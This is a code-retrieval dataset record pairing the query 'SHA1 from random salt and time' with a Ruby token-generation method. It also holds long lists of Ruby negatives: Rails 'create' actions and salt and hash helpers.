"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n item = Item.new(item_params)\n item.done = \"0\"\n item.trash = \"0\"\n\n if item.save\n render json: {data:item}, status: :created\n else\n render json: {data:item}, status: :unprocessable_entity\n end\n end",
"def create\n @item = Item.new(item_params)\n \n respond_to do |format|\n if @item.save \n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, location: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: \"Item was successfully created.\" }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new, status: :unprocessable_entity }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_item(name, price)\r\n new_item = Trading::Item.created( name, price, self )\r\n self.item_list.push(new_item) # AK You can also do `item_list << new_item`\r\n return new_item\r\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to '/items', notice: 'Item was successfully created.' }\n format.json { render action: 'show', status: :created, location: @item }\n else\n format.html { render action: 'new' }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n create_params = item_params\n item = Item.new(\n name: create_params[:name], \n is_complete: false, #create_params[:is_complete], \n list_id: create_params[:list_id])\n\n item.save!\n render json: item\n end",
"def create_item(data_bag, item_name, data = {}, metadata = {})\n item = ::SecureDataBag::Item.new(metadata)\n item.raw_data = { 'id' => item_name }.merge(data)\n item.data_bag data_bag\n item\n end",
"def create\n @request_item = RequestItem.new(request_item_params)\n @request_item.item = Item.new(name: params[:request_item][:item][:name])\n\n if @request_item.save\n render json: @request_item \n else\n render json: @request_item.errors, status: :bad_request\n end\n end",
"def create(params = {})\n record = new(params)\n record.save && record\n end",
"def create(options)\n item = build(options)\n item.save\n item\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render action: 'show', status: :created, location: @item }\n else\n format.html { render action: 'new' }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render action: 'show', status: :created, location: @item }\n else\n format.html { render action: 'new' }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render action: 'show', status: :created, location: @item }\n else\n format.html { render action: 'new' }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render action: 'show', status: :created, location: @item }\n else\n format.html { render action: 'new' }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to @item, notice: 'Item was successfully created.' }\n format.json { render action: 'show', status: :created, location: @item }\n else\n format.html { render action: 'new' }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to root_url, notice: 'Item was successfully created.' }\n format.json { render json: @item, status: :created, item: @item }\n else\n format.html { render action: \"new\" }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_record!(hash, inventory_object)\n record = inventory_collection.model_class.create!(hash.except(:id))\n inventory_collection.store_created_records(record)\n\n inventory_object.id = record.id\n end",
"def item_create\n @item = Item.new(item_params)\n respond_to do |format|\n if @item.save\n format.html { redirect_to item_index_path, notice: 'O item foi criado com sucesso.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :item_new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def add(product)\n items.create(product: product)\n end",
"def generate_new_item_object\n @new_item = Flight.new\n insert_required_params_into_new_item_object\n insert_default_params_into_new_item_object\n insert_optional_params_into_new_item_object(self)\n return @new_item\n end",
"def create\n @item = current_owner.items.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to items_path, notice: 'Item was created successfully' }\n format.json { render :show, status: :created, location: items_path }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_item(iid, itypes, params={})\n params.merge!(default_params)\n params['pio_iid'] = iid\n format_itypes(itypes, params)\n extract_latlng(params)\n extract_startend(params)\n @connection.post(:items, params).body\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n flash[:notice] = 'Item was successfully created.'\n format.html { redirect_to(@item) }\n format.xml { render :xml => @item, :status => :created, :location => @item }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @item.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n flash[:notice] = 'Item was successfully created.'\n format.html { redirect_to(@item) }\n format.xml { render :xml => @item, :status => :created, :location => @item }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @item.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to(@item, :notice => 'Item was successfully created.') }\n format.xml { render :xml => @item, :status => :created, :location => @item }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @item.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to(@item, :notice => 'Item was successfully created.') }\n format.xml { render :xml => @item, :status => :created, :location => @item }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @item.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n if !self.auth_admin\n @item = Item.new(item_params)\n respond_to do |format|\n if @item.save\n format.html { redirect_to item_path(@item), notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n end\n end\n end\n end",
"def create\n item = Item.new(item_params)\n item.user = current_user\n if item.save\n render json: item\n else\n render json: {errors: item.errors}, status: :unprocessable_entity\n end\n end",
"def create\n @item = Item.new(item_params)\n\n if @item.save\n render json: @item\n else\n render json: { error: t('story_create_error') }, status: :unprocessable_entity\n end\n end",
"def create\n @item = Item.new(params[:item])\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to(items_path) }\n format.xml { render :xml => @item, :status => :created, :location => @item }\n else\n format.html { redirect_to(items_path)}\n format.xml { render :xml => @item.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n # The item is either \"Local\" or \"Remote\" depending on the source selected\n @item = Item.factory(params[:source], params[@hash_key.to_sym])\n \n respond_to do |format|\n if @item.save\n flash[:notice] = 'Item was successfully created.'\n format.html { redirect_to(item_url(@item)) }\n format.xml { render :xml => @item, :status => :created, :location => @item }\n else\n format.html { render :action => \"new\" }\n format.xml { render :xml => @item.errors, :status => :unprocessable_entity }\n end\n end\n end",
"def create\n @user = User.find(current_user.id)\n @item = @user.items.new(item_params)\n\n respond_to do |format|\n if @item.save\n format.html { redirect_to '/items', notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @item }\n else\n format.html { render :new }\n format.json { render json: @item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create(attrs = {})\n record = new(attrs)\n record.save\n record\n end",
"def create!(name, params = {})\n item = build(name, params)\n item.save!\n item\nend",
"def create\n @item = Item.new(params[:item])\n @item.save\n respond_with @item\n end",
"def create\n @item = Item.new(item_params)\n if @item.save\n flash[:success] = \"項目已新增!\"\n redirect_to root_url\n else\n flash[:danger] = \"新增失敗!\"\n @submit_text = \"新增\"\n render 'new'\n end\n end",
"def create_item(location_id, body, opts = {})\n data, _status_code, _headers = create_item_with_http_info(location_id, body, opts)\n return data\n end",
"def create\n @itemstore = ItemStore.new(item_store_params)\n\n respond_to do |format|\n if @itemstore.save\n format.html { redirect_to @itemstore, notice: 'Item was successfully created.' }\n format.json { render :show, status: :created, location: @itemstore }\n else\n format.html { render :new }\n format.json { render json: @itemstore.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create_todo_item(title, description)\n new_item = Todoitem.new\n new_item.title = title\n new_item.description = description\n new_item.save\n end",
"def create\n @data_item = DataItem.new(data_item_params)\n\n respond_to do |format|\n if @data_item.save\n format.html { redirect_to @data_item, notice: 'Data item was successfully created.' }\n format.json { render :show, status: :created, location: @data_item }\n else\n format.html { render :new }\n format.json { render json: @data_item.errors, status: :unprocessable_entity }\n end\n end\n end",
"def create(atts = {})\n rec = self.new(atts)\n rec.save && rec\n end",
"def newitem\n entry = Pages::Storage::Entry.new(self)\n\n entry.title = ''\n entry.tags = []\n entry.date = Time.new\n entry.content = ''\n entry.draft = false\n\n @items << entry\n\n return entry\n end",
"def create\n data = CatalogItem.new(name: params[:name], description: params[:description])\n data.save\n render json: data\n end",
"def create\n cart_uuid = params[:cart_id]\n @item = Item.new(item_params.merge(cart_uuid: cart_uuid))\n if @item.save\n render json: @item, status: 201\n else\n render_errors 400, @item.errors.full_messages\n end\n end",
"def create\n @item = Item.create(item_params)\n @items = List.find(item_params[:list_id]).items.order(\"id ASC\")\n @list_id = item_params[:list_id]\n end",
"def create\n @item = @list.items.create(item_params)\n redirect_to @list\n end",
"def create(opts)\n opts = check_params(opts,[:items])\n super(opts)\n end",
"def create\n @rentable_item = RentableItem.new(rentable_item_params)\n @rentable_item.save\n end",
"def create(item_attrs = {})\n body = { value: item_attrs }\n Iterable.request(conf, base_path).put(body)\n end"
] |
[
"0.71818566",
"0.70745796",
"0.706473",
"0.6996472",
"0.6975625",
"0.695367",
"0.6938458",
"0.69055516",
"0.68687993",
"0.68202734",
"0.6817313",
"0.6815403",
"0.6807482",
"0.68023145",
"0.67395693",
"0.67165935",
"0.67165935",
"0.67165935",
"0.66843593",
"0.66820943",
"0.668136",
"0.66793805",
"0.66718817",
"0.667014",
"0.66676474",
"0.6665018",
"0.66574043",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.6653529",
"0.66503215",
"0.66206294",
"0.66185606",
"0.66185606",
"0.66185606",
"0.66185606",
"0.66185606",
"0.66185606",
"0.66185606",
"0.6618512",
"0.66149503",
"0.6601659",
"0.65982336",
"0.65965325",
"0.6585502",
"0.65826994",
"0.65791196",
"0.65654665",
"0.65595484",
"0.65595484",
"0.65595484",
"0.65595484",
"0.65595484",
"0.65580666",
"0.65476495",
"0.65462023",
"0.65317416",
"0.6528373",
"0.65169334",
"0.65044874",
"0.6494746",
"0.6494746",
"0.64898366",
"0.64898366",
"0.6487314",
"0.64494735",
"0.644896",
"0.6431005",
"0.64175165",
"0.64136773",
"0.64130485",
"0.64082164",
"0.6398675",
"0.63926196",
"0.6392346",
"0.63895977",
"0.6388677",
"0.6381697",
"0.63786274",
"0.6378275",
"0.63750553",
"0.6359658",
"0.63549554",
"0.63546836",
"0.63447565",
"0.63420236",
"0.6341523"
] |
0.7281687
|
0
|
SHA1 from random salt and time
|
def generate_access_token
self.access_token = Digest::SHA1.hexdigest("#{random_salt}#{Time.now.to_i}")
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_salt\n d = Digest::SHA1.new\n now = Time.now\n d.update(now.to_s)\n d.update(String(now.usec))\n d.update(String(rand(0)))\n d.update(String($$))\n d.update('wxtengu.net')\n d.hexdigest\n end",
"def generate_salt\n Digest::SHA1.hexdigest(Time.now.to_f.to_s)\n end",
"def generate_salt\n Digest.hexencode(Digest::SHA1.digest(\n \"#{rand(2 ** 128) * ( Time.now.to_i * Process.pid)}\"))\n end",
"def to_sha1(salt = \"\")\n hashsum(:sha1, salt)\n end",
"def sha1_hex\n Digest::SHA1.hexdigest(salted_name)\n end",
"def generate_salt\n return hash(\n Time.now.to_s,\n rand(999_999_999).to_s,\n Time.now.usec\n )\n end",
"def make_salt\n\t secure_hash(\"#{Time.now.utc}--#{password}\")\n\tend",
"def make_salt\n secure_hash(\"#Time.now.utc}--#{password}\")\n end",
"def create_new_salt\n self.salt = Digest::SHA256.hexdigest(Time.now.to_s + rand.to_s)\n end",
"def create_new_salt\n self.salt = Digest::SHA256.hexdigest(Time.now.to_s + rand.to_s)\n end",
"def make_salt\n secure_hash(\"#{Time.now.utc}--#{password}\")\n end",
"def make_salt\n secure_hash(\"#{Time.now.utc}--#{password}\")\n end",
"def make_salt\n secure_hash(\"#{Time.now.utc}--#{password_digest}\")\n end",
"def make_salt\r\n self.salt = sha_hash(\"#(Time.now.to_s)--#(self.password)\")\r\n end",
"def salt\n # 72 bits\n SecureRandom.hex(9)\n end",
"def generate_salt\n salt = \"\"\n 64.times { \n salt << (i = Kernel.rand(62); i += ((i < 10) ? 48 : ((i < 36) ? 55 : 61 ))).chr }\n salt\n end",
"def sha1; end",
"def sha1; end",
"def generate_salt\n @salt = self.object_id.to_s + rand.to_s\n end",
"def generate_salt\n self.salt = self.object_id.to_s + rand.to_s\n end",
"def create_new_salt\n self.salt = self.object_id.to_s + rand.to_s\n end",
"def create_new_salt\n self.salt = self.object_id.to_s + rand.to_s\n end",
"def rand_salt\n result = ''\n salt().length.times {result << salt()[rand(salt().length),1]}\n result\n end",
"def salt() 'monkeynutzzSfaKT7CwImCHCH8Ow' end",
"def create_new_salt\n\t\tself.salt = self.object_id.to_s + rand.to_s\n end",
"def generate_salt\n self.salt = SecureRandom.base64(8)\n end",
"def create_new_salt \n self.password_salt = self.object_id.to_s + rand.to_s\n end",
"def calc_x(username, password, salt)\n spad = if salt.length.odd? then '0' else '' end\n sha1_hex(spad + salt + sha1_str([username, password].join(':'))).hex\n end",
"def get_salt\n [Array.new(6){rand(256).chr}.join].pack(\"m\" ).chomp\n end",
"def create_new_salt\n self.password_salt = [Array.new(6){rand(256).chr}.join].pack(\"m\").chomp\n end",
"def make_token\r\n # From the restful-authentication plug-in\r\n args = [ Time.now, (1..10).map{ rand.to_s } ]\r\n Digest::SHA1.hexdigest(args.flatten.join('--'))\r\n end",
"def create_new_salt\n\t\t(self.salt = self.object_id.to_s + rand.to_s) if self.salt.nil?\n\tend",
"def create_salt()\n size=10\n pool = ('a'..'z').to_a + ('0'..'9').to_a\n self.salt= (1..size).collect{|a| pool[rand(pool.size)]}.join\n end",
"def create_hash(user_pw)\n return Digest::SHA1.hexdigest(user_pw)\nend",
"def sha1_base64\n str = Base64.encode64(Digest::SHA1.digest(salted_name)).strip\n str.tr('+/', '-_').gsub(/=/,'')\n end",
"def generate_token(pass, salt)\n Digest::SHA256.hexdigest(pass + salt)\n end",
"def create_salt\n\t\t\tself.password_seed = self.object_id.to_s + rand.to_s\n\t\tend",
"def build_hash_code\n\t\tSecureRandom.hex(8) + (Time.now.to_f * 1000).to_i.to_s\n\tend",
"def generate_salt\n salt_time = (ENV['RACK_ENV'] == 'test' ? 0.01 : 1.25)\n self[:salt] = SCrypt::Engine.generate_salt(max_time: salt_time)\n end",
"def short_sha1(length=7)\n sha1[0, length]\n end",
"def short_sha1(length=7)\n sha1[0, length]\n end",
"def to_sha1(length = 40)\n Digest::SHA1.hexdigest(self)[0,length]\n end",
"def send_salt( session, user )\n salt = Digest::MD5.hexdigest( user + Time.now.strftime('%M%S') + rand(300).to_s )\n session.puts salt\n return salt\n end",
"def generate_digest\n Digest::SHA512.hexdigest(\"#{Time.now.usec}#{rand(100)}#{Session.secret}\")\n end",
"def gen_salt\n chars = []\n 8.times { chars << SALT_CHARS[rand(SALT_CHARS.size)] }\n chars.join('') \n end",
"def make_hash\n chars = (\"a\"..\"z\").to_a + (\"A\"..\"Z\").to_a + (\"0\"..\"9\").to_a\n string = \"\"\n 20.times do\n string << chars[rand(chars.size-1)]\n end\n hash = Digest::SHA2.hexdigest(string)\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(password + salt)\n end",
"def hex_sha1(s)\n binb2hex(core_sha1(str2binb(s), s.length * $chrsz))\n end",
"def gen_salt\n chars = []\n 8.times { chars << SALT_CHARS[SecureRandom.random_number(SALT_CHARS.size)] }\n chars.join('')\n end",
"def pwdhash(salt=nil)\n salt = String.random_password.md5 if salt.nil?\n salt = salt[0..8]\n salt+(salt+self).sha1\n end",
"def hex_sha1(s)\n return binb2hex(core_sha1(str2binb(s), s.length * $chrsz))\n end",
"def sha1=(_); end",
"def code_salt\n 'fbbc13ed4a51e27608037365e1d27a5f992b6339'\n end",
"def init_salt\n self.salt = SecureRandom.hex(25) if self.salt.blank?\n end",
"def random_pbkdf2_salt\n encode_bytes(SecureRandom.random_bytes(16))\n end",
"def generate_code\n self.code = Digest::SHA1.hexdigest(\"--#{Time.now.to_s}--#{user_id}--#{rand(256)}\")[0,32]\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--#{password}--\")\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--#{password}--\")\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--#{password}--\")\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--#{password}--\")\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--#{password}--\")\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--#{password}--\")\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--#{password}--\")\n end",
"def sha1?; @sha1; end",
"def mutate_bcrypt_salt(_)\n 'au6lOASvp17AGsqkmE7'\n end",
"def make_activation_code\n self.activation_code = Digest::SHA1.hexdigest( Time.now.to_s.split(//).sort_by {rand}.join )\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--#{password}--\")\n end",
"def digest(string, options = {})\n salt = options[:salt] || SecureRandom.base64\n Digest::SHA1.hexdigest(\"#{salt}--#{string}\")\n end",
"def to_sha2(salt = \"\")\n hashsum(:sha2, salt)\n end",
"def token_and_salt\n today_string = Time.now.to_date.to_s\n return token_with_salt(today_string), today_string\n end",
"def createSHAHash(data)\n\t\treturn Digest::SHA1.digest(data)\n\tend",
"def sha1(string)\n\tOpenSSL::Digest::SHA1.hexdigest(string)\nend",
"def make_token\n secure_digest(Time.now, (1..10).map{ rand.to_s })\n end",
"def make_activation_code\n self.activation_code = Digest::SHA1.hexdigest( Time.now.to_s.split(//).sort_by {rand}.join )\n end",
"def make_password_reset_code\n self.password_reset_code = Digest::SHA1.hexdigest( Time.now.to_s.split(//).sort_by {rand}.join )\n end",
"def generate_nonce(time = Time.now)\n return Digest::MD5.hexdigest( time )\n end",
"def encrypt(password, salt)\n Digest::SHA1.hexdigest(\"--#{salt}--NaCl--#{password}--\")\n end",
"def calc_x(username, password, salt)\n sha512_hex(salt + sha512_str([username, password].join(':'))).hex\n end",
"def core_sha1(x, len)\n # append padding\n x[len >> 5] ||= 0\n x[len >> 5] |= 0x80 << (24 - len % 32)\n x[((len + 64 >> 9) << 4) + 15] = len\n\n w = Array.new(80, 0)\n a = 1_732_584_193\n b = -271_733_879\n c = -1_732_584_194\n d = 271_733_878\n e = -1_009_589_776\n\n # for(var i = 0; i < x.length; i += 16)\n i = 0\n while i < x.length\n olda = a\n oldb = b\n oldc = c\n oldd = d\n olde = e\n\n # for(var j = 0; j < 80; j++)\n j = 0\n while j < 80\n if j < 16\n w[j] = x[i + j] || 0\n else\n w[j] = rol(w[j - 3] ^ w[j - 8] ^ w[j - 14] ^ w[j - 16], 1)\n end\n\n t = safe_add(safe_add(rol(a, 5), sha1_ft(j, b, c, d)),\n safe_add(safe_add(e, w[j]), sha1_kt(j)))\n e = d\n d = c\n c = rol(b, 30)\n b = a\n a = t\n j += 1\n end\n\n a = safe_add(a, olda)\n b = safe_add(b, oldb)\n c = safe_add(c, oldc)\n d = safe_add(d, oldd)\n e = safe_add(e, olde)\n i += 16\n end\n [a, b, c, d, e]\n end",
"def get_crypto_salt_hex\n return @crypto_salt if ! @crypto_salt\n @crypto_salt.unpack(\"H*\")\n end",
"def generate_hash(id, raffle_number)\n Digest::SHA256.base64digest(id+ raffle_number)\nend",
"def digest_password\n token = nonce + timestamp + password\n Base64.encode64(Digest::SHA1.hexdigest(token)).chomp!\n end",
"def generate_salts\n @verify_salt = OpenSSL::Random.random_bytes(KEYLEN)\n @encrypt_salt = OpenSSL::Random.random_bytes(KEYLEN)\n end",
"def core_sha1(x, len)\n # append padding\n x[len >> 5] ||= 0\n x[len >> 5] |= 0x80 << (24 - len % 32)\n x[((len + 64 >> 9) << 4) + 15] = len\n\n w = Array.new(80, 0)\n a = 1732584193\n b = -271733879\n c = -1732584194\n d = 271733878\n e = -1009589776\n\n #for(var i = 0; i < x.length; i += 16)\n i = 0\n while(i < x.length)\n olda = a\n oldb = b\n oldc = c\n oldd = d\n olde = e\n\n #for(var j = 0; j < 80; j++)\n j = 0\n while(j < 80)\n if(j < 16) \n w[j] = x[i + j] || 0\n else \n w[j] = rol(w[j-3] ^ w[j-8] ^ w[j-14] ^ w[j-16], 1)\n end\n\n t = safe_add(safe_add(rol(a, 5), sha1_ft(j, b, c, d)),\n safe_add(safe_add(e, w[j]), sha1_kt(j)))\n e = d\n d = c\n c = rol(b, 30)\n b = a\n a = t\n j += 1\n end\n\n a = safe_add(a, olda)\n b = safe_add(b, oldb)\n c = safe_add(c, oldc)\n d = safe_add(d, oldd)\n e = safe_add(e, olde)\n i += 16\n end\n return [a, b, c, d, e]\n end",
"def sha1\n Digest::SHA1.hexdigest(subject.identification + 0.chr + source)\n end",
"def authenticatable_salt; end",
"def salt\n return NSEC3.encode_salt(@salt)\n end",
"def sign_user_token(email, salt)\n Digest::MD5.hexdigest(\"#{email}:#{salt}\")\n end",
"def hash_username\n charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n Digest::SHA1.hexdigest(email + created_at.usec.to_s)\n .chars\n .each_slice(2)\n .map(&:join)\n .map { |hex| hex.to_i(16) }\n .map { |i| charset[i % charset.length] }\n .join\n .slice(0, 6)\n end",
"def generate_token\n self.perishable_token = Digest::MD5.hexdigest(\"#{Time.now}\")\n end",
"def hash(ts)\n sig = [\n Rackspace::Email::Api.configuration.user_key,\n Rackspace::Email::Api.configuration.user_agent,\n ts,\n Rackspace::Email::Api.configuration.api_key\n ].join('')\n\n Base64.encode64(Digest::SHA1.digest(sig))\n end",
"def salt!\n returning self.class.generate_salt do |s|\n write_attribute(:salt, s)\n end\n end",
"def digest\n Digest::SHA1.hexdigest(self)\n end",
"def salt\n nil\n end",
"def authenticatable_salt\n end",
"def calculate_auth_string( salt, user )\n return hash( salt, @creds[user] )\n end",
"def sha1(data)\n @connection.sha1(data)\n end",
"def encrypt(password)\n Digest::SHA1.hexdigest(\"--#{self.salt}--#{password}--\")\n end",
"def hex(string)\n Digest::SHA1.hexdigest(string)\n end",
"def unique_identifier\n Digest::SHA1.hexdigest(\"#{login_name}:#{password}\")\n end",
"def salted_hash(password)\n salt = SecureRandom.random_bytes(SALT_BYTE_SIZE)\n pbkdf2 = OpenSSL::PKCS5::pbkdf2_hmac_sha1(\n password,\n salt,\n CRYPTERATIONS,\n HASH_BYTE_SIZE)\n\n { salt: salt, pbkdf2: Base64.encode64(pbkdf2) }\n end"
] |
[
"0.80259615",
"0.8023818",
"0.77334017",
"0.75979465",
"0.7589524",
"0.7567159",
"0.7516362",
"0.75071925",
"0.74795616",
"0.74795616",
"0.7473809",
"0.7473809",
"0.74353564",
"0.72481304",
"0.7150325",
"0.7124441",
"0.70152485",
"0.70152485",
"0.7003422",
"0.6972043",
"0.69604295",
"0.69604295",
"0.6936041",
"0.6912479",
"0.6897493",
"0.6857891",
"0.68262196",
"0.6808",
"0.6798705",
"0.6795715",
"0.6782387",
"0.67667353",
"0.6703252",
"0.6703125",
"0.6694511",
"0.6680498",
"0.6664299",
"0.66639817",
"0.6657061",
"0.66326267",
"0.66326267",
"0.6588873",
"0.657849",
"0.65429866",
"0.6537917",
"0.6531597",
"0.65306234",
"0.64891136",
"0.64873385",
"0.6478277",
"0.64757675",
"0.6466719",
"0.6445445",
